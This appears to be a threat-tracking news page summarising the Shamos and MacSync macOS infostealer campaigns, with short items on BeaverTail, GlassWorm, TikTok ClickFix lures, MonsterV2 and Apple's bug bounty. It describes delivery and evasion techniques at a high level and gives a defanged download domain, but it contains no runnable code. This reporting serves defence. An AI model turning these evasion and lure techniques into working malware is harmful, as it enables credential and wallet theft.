CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Shamos Infostealer Targeting Mac Devices via ClickFix Attacks

First reported
Last updated
3 unique sources, 4 articles

Summary

Hide ▲

A new infostealer malware named Shamos is targeting Mac devices through ClickFix attacks. The malware, developed by the COOKIE SPIDER group, steals data and credentials from web browsers, Keychain, Apple Notes, and cryptocurrency wallets. The attacks use malvertising and fake GitHub repositories to lure victims into executing shell commands that download and install the malware. Since June 2025, Shamos has attempted infections in over three hundred environments monitored by CrowdStrike. The malware uses anti-VM commands, AppleScript for reconnaissance, and creates persistence through a Plist file. Users are advised to avoid executing unknown commands and to seek help from trusted sources. A new variant of the MacSync stealer, related to Shamos, is distributed through a digitally signed, notarized Swift application, bypassing macOS Gatekeeper checks. This variant uses evasion techniques such as inflating the DMG file with decoy PDFs and performing internet connectivity checks. The malware runs largely in memory and cleans up temporary files after execution, leaving minimal traces behind. The associated developer certificate has been revoked. The latest variant of MacSync stealer is delivered through a digitally signed, notarized Swift application masquerading as a messaging app installer. The disk image file named 'zk-call-messenger-installer-3.9.2-lts.dmg' is hosted on 'zkcall[.]net/download'. The installer displays instructions prompting users to right-click and open the app to sidestep Gatekeeper safeguards. The Swift-based dropper performs a series of checks before downloading and executing an encoded script through a helper component. The curl command used to retrieve the payload shows clear deviations from earlier variants, using flags like -fL and -sS, and additional options like --noproxy. The DMG file is unusually large at 25.5 MB, inflated with unrelated PDF documents. The Base64-encoded payload corresponds to MacSync, a rebranded version of Mac.c that first emerged in April 2025. MacSync comes fitted with a fully-featured Go-based agent that enables remote command and control capabilities.

Timeline

  1. 22.12.2025 22:43 3 articles · 2d ago

    New MacSync variant bypasses macOS Gatekeeper checks

    A new variant of the MacSync stealer is distributed through a digitally signed, notarized Swift application, bypassing macOS Gatekeeper checks. This variant uses evasion techniques such as inflating the DMG file with decoy PDFs and performing internet connectivity checks. The malware runs largely in memory and cleans up temporary files after execution, leaving minimal traces behind. The associated developer certificate has been revoked. The latest variant of MacSync stealer is delivered through a digitally signed, notarized Swift application masquerading as a messaging app installer. The disk image file named 'zk-call-messenger-installer-3.9.2-lts.dmg' is hosted on 'zkcall[.]net/download'. The installer displays instructions prompting users to right-click and open the app to sidestep Gatekeeper safeguards. The Swift-based dropper performs a series of checks before downloading and executing an encoded script through a helper component. The curl command used to retrieve the payload shows clear deviations from earlier variants, using flags like -fL and -sS, and additional options like --noproxy. The DMG file is unusually large at 25.5 MB, inflated with unrelated PDF documents. The Base64-encoded payload corresponds to MacSync, a rebranded version of Mac.c that first emerged in April 2025. MacSync comes fitted with a fully-featured Go-based agent that enables remote command and control capabilities.

    Show sources
    Open in new tab
  2. 22.08.2025 18:44 2 articles · 4mo ago

    Shamos infostealer targeting Mac devices via ClickFix attacks

    Since June 2025, Shamos infostealer has attempted infections in over three hundred environments. The malware, developed by the COOKIE SPIDER group, steals data and credentials from web browsers, Keychain, Apple Notes, and cryptocurrency wallets. It is distributed through ClickFix attacks using malvertising and fake GitHub repositories. The malware uses anti-VM commands, AppleScript for reconnaissance, and creates persistence through a Plist file. Users are advised to avoid executing unknown commands and to seek help from trusted sources.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Lazarus Group Expands BeaverTail Malware Capabilities

A new variant of the BeaverTail malware has been linked to the Lazarus Group, targeting cryptocurrency traders, developers, and retail employees. The malware, which functions as both an information stealer and a loader, has evolved to include advanced obfuscation techniques and diverse delivery methods. It has been observed using layered Base64 and XOR encoding to conceal its behavior and has been distributed through trojanized npm packages, fake job interview platforms, and ClickFix lures. The malware's capabilities now include keylogging, screenshot capture, and clipboard monitoring, aimed at stealing cryptocurrency wallet data and credentials. Additionally, BeaverTail has been merged with another DPRK-linked strain known as OtterCookie, enhancing its browser profile enumeration and remote access capabilities.

Open in new tab

GlassWorm malware targets OpenVSX, VS Code registries

The GlassWorm malware campaign has resurfaced with a third wave, adding 24 new packages to OpenVSX and Microsoft Visual Studio Marketplace. The malware uses invisible Unicode characters to hide malicious code and targets GitHub, NPM, and OpenVSX account credentials, as well as cryptocurrency wallet data. The campaign initially impacted 49 extensions, with an estimated 35,800 downloads, though this figure includes inflated numbers due to bots and visibility-boosting tactics. The Eclipse Foundation has revoked leaked tokens and introduced security measures, but the threat actors have pivoted to GitHub and now returned to OpenVSX with updated command-and-control endpoints. The malware's global reach includes systems in the United States, South America, Europe, Asia, and a government entity in the Middle East. Koi Security has accessed the attackers' server and shared victim data with law enforcement. The threat actors have posted a fresh transaction to the Solana blockchain, providing an updated C2 endpoint for downloading the next-stage payload. The attacker's server was inadvertently exposed, revealing a partial list of victims spanning the U.S., South America, Europe, and Asia, including a major government entity from the Middle East. The threat actor is assessed to be Russian-speaking and uses the open-source browser extension C2 framework named RedExt as part of their infrastructure. The third wave of Glassworm uses Rust-based implants packaged inside the extensions and targets popular tools and developer frameworks like Flutter, Vim, Yaml, Tailwind, Svelte, React Native, and Vue. Additionally, a malicious Rust package named "evm-units" was discovered, targeting Windows, macOS, and Linux systems. This package, uploaded to crates.io in mid-April 2025, attracted over 7,000 downloads and was designed to stealthily execute on developer machines by masquerading as an Ethereum Virtual Machine (EVM) unit helper tool. The package checks for the presence of Qihoo 360 antivirus and alters its execution flow accordingly. The references to EVM and Uniswap indicate that the supply chain incident is designed to target developers in the Web3 space.

Open in new tab

TikTok Videos Distribute Infostealers via ClickFix Attacks

Cybercriminals are using TikTok videos to distribute information-stealing malware through ClickFix attacks. The videos, disguised as activation guides for popular software like Windows, Spotify, and Netflix, trick users into executing malicious PowerShell commands. These commands download and execute Aura Stealer malware, which steals credentials, cookies, and cryptocurrency wallets. The campaign has been ongoing and is similar to one observed by Trend Micro in May 2025.

Open in new tab

TA585 Using MonsterV2 in Phishing Campaigns

TA585, a sophisticated threat actor, has been actively delivering the MonsterV2 malware via phishing campaigns since February 2025. The group manages its own infrastructure and employs multiple delivery techniques, including IRS and SBA-themed lures, malicious JavaScript injections, and fake CAPTCHA verifications. MonsterV2, also known as Aurotun Stealer, is a versatile malware capable of stealing sensitive data, acting as a clipper, establishing remote control, and executing commands from a C2 server. The malware is sold by a Russian-speaking actor and is typically packed using a C++ crypter called SonicCrypt to evade detection. TA585's campaigns have also included GitHub-themed lures and the distribution of other malware, such as Rhadamanthys. MonsterV2 avoids infecting systems in Commonwealth of Independent States (CIS) countries.

Open in new tab

Apple increases bug bounty payouts for zero-click RCE vulnerabilities

Apple has expanded and redesigned its bug bounty program, doubling maximum payouts and adding new research categories. The highest reward is now $2 million for zero-click remote code execution (RCE) vulnerabilities, with a bonus system that can exceed $5 million. The program now includes higher payouts for various types of vulnerabilities, including one-click remote attacks, wireless proximity attacks, and unauthorized iCloud access. Apple also plans to distribute secured iPhone 17 devices to civil society organizations and researchers in 2026. The changes aim to incentivize the discovery and reporting of sophisticated security issues, particularly those exploited by mercenary spyware. The program has awarded $35 million to 800 security researchers since its inception in 2020. The expansion includes a $100,000 reward for a complete Gatekeeper bypass and a $1 million reward for broad unauthorized iCloud access. Apple's latest bug bounty announcement is a response to the growth of commercial spyware activity, with the UK’s National Cyber Security Centre (NCSC) estimating that the commercial cyber intrusion sector doubles every 10 years.

Open in new tab